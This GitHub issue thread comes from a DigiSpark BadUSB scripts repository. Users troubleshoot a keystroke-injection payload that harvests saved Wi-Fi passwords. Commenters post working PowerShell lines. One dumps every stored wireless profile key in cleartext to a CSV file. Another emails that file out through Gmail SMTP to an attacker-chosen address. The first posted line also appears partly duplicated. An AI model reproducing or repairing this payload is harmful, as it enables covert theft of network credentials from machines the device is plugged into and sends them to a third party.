### ISSUE TITLE
Nothing in email

### ISSUE THREAD

**Issue by ClutchMonkey** [CedArctic/DigiSpark-Scripts#9]
I've been messing around with this script for hours and I finally got it to send me an email. But when I go to check my email, there is nothing inside the message. Could I get some help please. 
BTW I have a pretty new machine and have delays on, and I allowed less secure apps on google. 
P.S. I also have a few lines of red text right before my second power shell closes. I dont know if that helps you out or not,, just wanted to address that.

**Comment by EffiBriest** [comment]
yeah I had the same problem here is my fix:
fix code line 22 to:
  DigiKeyboard.print(F("(netsh wlan show profiles) | Select-String '\\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | **Export-Csv temp.csv\**" "));

the error u were getting in PS was this one:
Cannot convert argument "item", with value: "temp.csv", for "Add" to type "System.Net.Mail.Attachment": "Cannot
convert value "temp.csv" to type "System.Net.Mail.Attachment". Error: "Could not find file
'C:\WINDOWS\system32\temp.csv'.""
At line:1 char:464
+ ... rds Your Digispark'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPI ...
+                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument﻿

**Comment by ClutchMonkey** [comment]
Ok so now it has this error message:
exit status 1
Error compiling for board Digispark (Default - 16.5mhz).

This report would have more information with
"Show verbose output during compilation"
option enabled in File -> Preferences.

And thats before I changed any code. I haven't touched the arduino software in about a month so I don't know if it has something to do with that, or if its my settings or what. Also, before that message, I was able to get an email so I'm pretty sure my settings are correct unless the software has changed of something. Please help me thanks!

**Comment by ez3kiel2517** [comment]
I had the same problem with the attachment file
putting the full file path into a variable and passing it as the argument seems to fix it for me.

replace the e-mail sending line with:

DigiKeyboard.print(F("$path = join-path $env:userprofile 'temp.csv'; $SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('GMAIL_USERNAME', 'GMAIL_PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDER_MAIL'; $ReportEmail.To.Add('RECEIVER_MAIL'); $ReportEmail.Subject = 'DigiSpark Report'; $ReportEmail.Body = 'Attached is your report. - Regards Your Digispark'; $ReportEmail.Attachments.Add($path); $SMTPInfo.Send($ReportEmail);exit"));

**Comment by CedArctic** [comment]
Sorry for joining the party late, missed the github notification. Given the solutions here I'm closing the issue. If it persists just comment so and I'll re-open it.
